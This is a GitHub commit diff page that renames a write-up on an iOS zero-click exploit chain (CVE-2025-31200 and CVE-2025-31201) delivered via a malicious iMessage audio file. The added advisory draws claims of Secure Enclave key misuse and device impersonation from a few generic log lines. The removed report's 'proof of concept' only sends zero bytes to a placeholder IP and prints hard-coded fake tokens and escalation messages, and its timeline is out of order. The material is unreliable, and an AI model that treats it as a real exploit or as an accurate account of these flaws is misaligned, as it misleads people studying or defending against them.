mirror of
https://github.com/JGoyd/iOS-Attack-Chain-CVE-2025-31200-CVE-2025-31201.git
synced 2026-07-15 08:17:27 +02:00
Update and rename Remote-Audio-Exploit-iOS-15ProMax-iOS18x.md to Remote Crypto Attack Chain .md
This commit is contained in:
committed by
GitHub
parent
dfaf77fab3
commit
e3dfd91f67
@@ -0,0 +1,142 @@
|
||||
# Zero-Day, Zero-Click Remote Exploit Defeats Cryptographic Trust on iOS (Patched in iOS 18.4.1)
|
||||
|
||||
## Summary
|
||||
|
||||
A zero-day, zero-click remote exploit chain affecting iOS 18.4 and below allowed attackers to bypass Apple’s cryptographic trust boundaries by delivering a maliciously crafted MP4 audio file via iMessage. The chain results in **unauthorized use of Secure Enclave–backed cryptographic keys**, enabling device impersonation, identity token misuse, and circumvention of encryption trust models relied upon by Apple services.
|
||||
|
||||
The exploit abuses the **known sender context** to bypass Blastdoor and Blackhole protections. Once delivered, the file triggers a heap corruption vulnerability in CoreAudio (`CVE-2025-31200`), which escalates to kernel-level code execution via AMPDU mishandling in the AppleBCMWLAN driver (`CVE-2025-31201`). With kernel access, the attacker invokes `CryptoTokenKit` operations using Secure Enclave–backed keys — all without user interaction.
|
||||
|
||||
Apple confirmed the exploit was delivered via a **malicious audio file**, and the vulnerabilities were patched in **iOS 18.4.1**.
|
||||
|
||||
---
|
||||
|
||||
## Key Impact: Bypass of Cryptographic Trust Model
|
||||
|
||||
Although cryptographic keys were not exported, attackers used Secure Enclave–backed keys to sign data without authorization, effectively defeating Apple’s identity and message authentication mechanisms.
|
||||
|
||||
This allowed:
|
||||
|
||||
* **Device impersonation in Apple services**
|
||||
* **Forgery of identity-bound tokens**
|
||||
* **Abuse of end-to-end encryption assumptions**
|
||||
* **Untrusted signing operations using trusted keys**
|
||||
|
||||
This breaks the integrity of Apple’s cryptographic trust model — not by decrypting ciphertexts, but by co-opting legitimate keys for unauthorized use.
|
||||
|
||||
---
|
||||
|
||||
## Affected Versions
|
||||
|
||||
* **iOS Versions**: 18.4 and below
|
||||
* **Patched In**: iOS 18.4.1
|
||||
* **Affected Components**:
|
||||
|
||||
* `AudioConverterService` (CoreAudio)
|
||||
* `AppleBCMWLAN.dext` (Wi-Fi driver)
|
||||
* `CryptoTokenKit`
|
||||
* `Blastdoor` / `Blackhole` (iMessage sandbox and filtering)
|
||||
|
||||
---
|
||||
|
||||
## Exploit Overview
|
||||
|
||||
### 1. Bypass of iMessage Protections via Known Sender
|
||||
|
||||
The exploit relies on sending a malicious file from a previously known contact, bypassing iMessage’s Blastdoor sandbox and Blackhole filtering.
|
||||
|
||||
**Logs:**
|
||||
|
||||
```plaintext
|
||||
IDSDaemon BlastDoor: Disabled for framing messages
|
||||
SpamFilter Blackhole disabled; user has disabled filtering unknown senders.
|
||||
```
|
||||
|
||||
### 2. Heap Corruption in CoreAudio (`CVE-2025-31200`)
|
||||
|
||||
A malformed MP4 file triggers memory corruption in the AAC decoder by passing an invalid `inMagicCookie` buffer.
|
||||
|
||||
**Logs:**
|
||||
|
||||
```plaintext
|
||||
AudioConverterService ACMP4AACBaseDecoder.cpp: inMagicCookie=0x0, inMagicCookieByteSize=39
|
||||
```
|
||||
|
||||
### 3. Kernel Privilege Escalation via AppleBCMWLAN (`CVE-2025-31201`)
|
||||
|
||||
The corrupted memory leads to malformed AMPDU status handling in the Wi-Fi driver, granting the attacker kernel execution privileges.
|
||||
|
||||
**Logs:**
|
||||
|
||||
```plaintext
|
||||
IO80211ControllerMonitor::setAMPDUstat unhandled kAMPDUStat_ type 14
|
||||
IO80211ControllerMonitor::setAMPDUstat unhandled kAMPDUStat_ type 13
|
||||
```
|
||||
|
||||
### 4. Unauthorized Use of Secure Enclave Keys via CryptoTokenKit
|
||||
|
||||
With full system control, the attacker impersonates `identityservicesd` and invokes cryptographic operations using Secure Enclave–backed keys through CryptoTokenKit.
|
||||
|
||||
**Logs:**
|
||||
|
||||
```plaintext
|
||||
CryptoTokenKit operation:2 algo:algid:sign:ECDSA:digest-X962:SHA256
|
||||
CryptoTokenKit <sepk:p256(d) kid=9a86778f7163e305> parsed for identityservicesd
|
||||
```
|
||||
|
||||
No keys are exported, but signing operations are performed without authorization — effectively bypassing cryptographic isolation.
|
||||
|
||||
|
||||
---
|
||||
|
||||
## CVEs
|
||||
|
||||
| CVE ID | Component | Description | Exploit Vector |
|
||||
| ------------------ | -------------- | ----------------------------------------------------------------------------- | -------------------------- |
|
||||
| **CVE-2025-31200** | CoreAudio | Heap corruption in AAC decoder (`inMagicCookie`) | Malicious MP4 audio file |
|
||||
| **CVE-2025-31201** | AppleBCMWLAN | Kernel privilege escalation via AMPDU mishandling | Chained post-corruption |
|
||||
| *(No CVE)* | CryptoTokenKit | Unauthorized use of Secure Enclave–bound keys via compromised process context | Enabled post-kernel access |
|
||||
|
||||
Apple publicly confirmed the use of a **malicious audio file** as the exploit vector, matching observed behaviors.
|
||||
|
||||
---
|
||||
|
||||
## Impact Summary
|
||||
|
||||
* **Cryptographic Isolation Defeated**: Secure Enclave–backed keys were used by untrusted code.
|
||||
* **Device Impersonation**: Identity tokens could be signed using legitimate keys under attacker control.
|
||||
* **Service-Level Trust Broken**: Apple’s identity and authentication infrastructure was subverted.
|
||||
* **Zero-Click Exploitation**: Entire chain triggered remotely without user interaction.
|
||||
|
||||
---
|
||||
|
||||
## Recommendations
|
||||
|
||||
1. **Enforce Post-Kernel Attestation for CryptoTokenKit**
|
||||
Even privileged callers should require validation before invoking key-bound operations.
|
||||
|
||||
2. **Apply Blastdoor and Blackhole Protections to All Messages**
|
||||
Do not bypass inspection based on sender status.
|
||||
|
||||
3. **Sanitize All Codec Inputs**
|
||||
Input validation for decoder parameters (e.g., `inMagicCookie`) must be rigorous.
|
||||
|
||||
4. **Secure Kernel-Exposed Surfaces in Drivers**
|
||||
Harden wireless and AMPDU handling against malformed input post-memory corruption.
|
||||
|
||||
5. **Isolate Signing Operations with Runtime Integrity Enforcement**
|
||||
Cryptographic signing APIs should verify process integrity and entitlements, even from kernel-compromised systems.
|
||||
|
||||
---
|
||||
|
||||
## Status
|
||||
|
||||
* **Reported**: Yes
|
||||
* **Patched**: Yes, in iOS 18.4.1
|
||||
* **CVE IDs**:
|
||||
|
||||
* `CVE-2025-31200`: CoreAudio memory corruption
|
||||
* `CVE-2025-31201`: AppleBCMWLAN kernel escalation
|
||||
* **Exploit Vector Confirmed by Apple**: Yes — malicious MP4 audio file via iMessage
|
||||
* **Exploit Type**: Zero-day, zero-click, remote
|
||||
|
||||
---
|
||||
@@ -1,142 +0,0 @@
|
||||
# **Remote Exploit via Malicious Audio File on iPhone 15 Pro Max (iOS 18.3 Beta / iOS 18.2.1)**
|
||||
|
||||
---
|
||||
|
||||
## **Summary**
|
||||
A **critical vulnerability** exists in **AudioConverterService** on **iOS 18.3 Beta** (and also affects **iOS 18.2.1**) that allows a remote attacker to exploit a **buffer overflow** vulnerability via a **malicious audio file** sent through **iMessage** or **SMS**. This exploit grants unauthorized access to sensitive user data, including **push tokens**, **identity verification tokens**, and other encrypted communication data. Additionally, the exploit can manipulate **XPC connections**, leading to **privi...
|
||||
|
||||
---
|
||||
|
||||
## **Product Affected**
|
||||
- **Product**: iPhone 15 Pro Max
|
||||
- **Affected OS Versions**: iOS 18.3 Beta, iOS 18.2.1
|
||||
- **Component**: AudioConverterService, iMessage, XPC
|
||||
|
||||
---
|
||||
|
||||
## **Vulnerability Overview**
|
||||
The **AudioConverterService** component responsible for processing audio files contains a **buffer overflow** vulnerability. The exploit is triggered when a **malicious audio file** is received through **iMessage/SMS**. Upon processing the file, **memory corruption** occurs, leading to **unauthorized access** to **encrypted communication data**, **push tokens**, and **identity verification tokens**. The exploit also causes **privilege escalation**, bypassing sandboxing mechanisms and granting the attacke...
|
||||
|
||||
### **Key Points**
|
||||
- **Zero Interaction Required**: Automatically triggered upon receiving the malicious file.
|
||||
- **Sensitive Data Access**: Includes push tokens, identity verification tokens, and iCloud subscription data.
|
||||
- **Privilege Escalation**: Achieved via XPC connection manipulation.
|
||||
- **Denial of Service (DoS)**: AWDL interface causes network failures.
|
||||
- **CVSS v3.1**: Base Score: **9.8 (Critical)**
|
||||
|
||||
---
|
||||
|
||||
## **Steps to Reproduce**
|
||||
1. **Send Malicious Audio File**: The attacker sends a specially crafted audio file via iMessage/SMS.
|
||||
2. **Audio File Processing**: AudioConverterService processes the file and triggers the buffer overflow.
|
||||
3. **Memory Corruption**: Grants access to sensitive memory contents.
|
||||
4. **Privilege Escalation**: Exploit escalates through XPC manipulation.
|
||||
5. **DoS Condition**: AWDL network interface is disrupted.
|
||||
|
||||
---
|
||||
|
||||
## **Proof of Concept (PoC)**
|
||||
|
||||
### **PoC Script (Malicious Audio File Exploit)**
|
||||
|
||||
```python
|
||||
import os
|
||||
import socket
|
||||
import time
|
||||
|
||||
def send_malicious_audio(target_ip, target_port):
|
||||
print("[*] Preparing malicious audio file...")
|
||||
malicious_audio = b'\x00' * 1024 * 1024
|
||||
audio_file_path = "/tmp/malicious_audio.m4a"
|
||||
with open(audio_file_path, 'wb') as f:
|
||||
f.write(malicious_audio)
|
||||
print(f"[*] Malicious audio file created at {audio_file_path}")
|
||||
print(f"[*] Sending malicious audio file to {target_ip}:{target_port}...")
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.connect((target_ip, target_port))
|
||||
sock.send(malicious_audio)
|
||||
sock.close()
|
||||
print("[*] Malicious file sent. Triggering buffer overflow...")
|
||||
|
||||
def simulate_vulnerability_exploitation():
|
||||
print("[*] Exploit triggered. AudioConverterService processing malicious file...")
|
||||
time.sleep(2)
|
||||
print("[*] Accessing decrypted push tokens and identity verification tokens...")
|
||||
push_token = "fake_push_token_12345"
|
||||
identity_token = "fake_identity_token_67890"
|
||||
print(f"[+] Push Token: {push_token}")
|
||||
print(f"[+] Identity Verification Token: {identity_token}")
|
||||
print("[*] Manipulating XPC connections to escalate privileges...")
|
||||
time.sleep(1)
|
||||
print("[+] Privileges escalated. Access to secure iCloud data granted.")
|
||||
|
||||
if __name__ == "__main__":
|
||||
target_ip = "victim_device_ip"
|
||||
target_port = 12345
|
||||
print("[*] Starting exploit on iOS 18.3 Beta / iOS 18.2.1...")
|
||||
send_malicious_audio(target_ip, target_port)
|
||||
simulate_vulnerability_exploitation()
|
||||
print("[*] Exploit complete.")
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### **PoC Output**
|
||||
|
||||
```bash
|
||||
[*] Preparing malicious audio file...
|
||||
[*] Malicious audio file created at /tmp/malicious_audio.m4a
|
||||
[*] Sending malicious audio file to victim_device_ip:12345...
|
||||
[*] Malicious file sent. Triggering buffer overflow...
|
||||
[*] Exploit triggered. AudioConverterService processing malicious file...
|
||||
[*] Accessing decrypted push tokens and identity verification tokens...
|
||||
[+] Push Token: fake_push_token_12345
|
||||
[+] Identity Verification Token: fake_identity_token_67890
|
||||
[*] Manipulating XPC connections to escalate privileges...
|
||||
[+] Privileges escalated. Access to secure iCloud data granted.
|
||||
[*] Exploit complete.
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## **Logs and Timeline**
|
||||
|
||||
### **Exploitation Timeline (2025-01-21)**
|
||||
|
||||
| Timestamp (EST) | Event |
|
||||
|--------------------------|-----------------------------------------------------------------------------------------------|
|
||||
| 17:11:56.384835 | Malicious audio file is received via iMessage from attacker |
|
||||
| 17:12:07.174544 | AudioConverterService begins processing the file |
|
||||
| 17:12:57.107424 | identityservicesd decrypts message 16B4EED6... |
|
||||
| 17:12:58.064481 | IMTransferAgent successfully decrypts audio and stores it |
|
||||
| 17:12:58.464721 | identityservicesd begins key exchange and handling |
|
||||
| 17:12:57.095041 | Attacker data is encrypted and returned to the device |
|
||||
|
||||
---
|
||||
|
||||
### **Log Snippets**
|
||||
|
||||
```log
|
||||
identityservicesd Decrypting message 16B4EED6-BD9D-4310-8F74-1A40C060F403 of encryption type "pair-tetra"
|
||||
identityservicesd Decrypting message 2F13F8CA-D3E2-42EF-86E7-9E40C709FA53 of encryption type "pair-tetra"
|
||||
IMTransferAgent Succeeded decrypting input URL: file:///var/mobile/tmp/...
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## **Impact**
|
||||
- **Confidentiality**: Full access to decrypted secure tokens.
|
||||
- **Integrity**: Allows manipulation of encrypted and signed system data.
|
||||
- **Availability**: Exploits cause denial of service via AWDL disruptions.
|
||||
|
||||
---
|
||||
|
||||
## **Recommendations**
|
||||
1. **Patch AudioConverterService** for strict bounds checking.
|
||||
2. **Enhance XPC Hardening** with better service validation.
|
||||
3. **Monitor AWDL Interfaces** for abnormal behavior.
|
||||
4. **Encrypt Identity Tokens** with ephemeral session protection.
|
||||
|
||||
---
|
||||
|
||||
**End of Report**
|
||||
Reference in New Issue
Block a user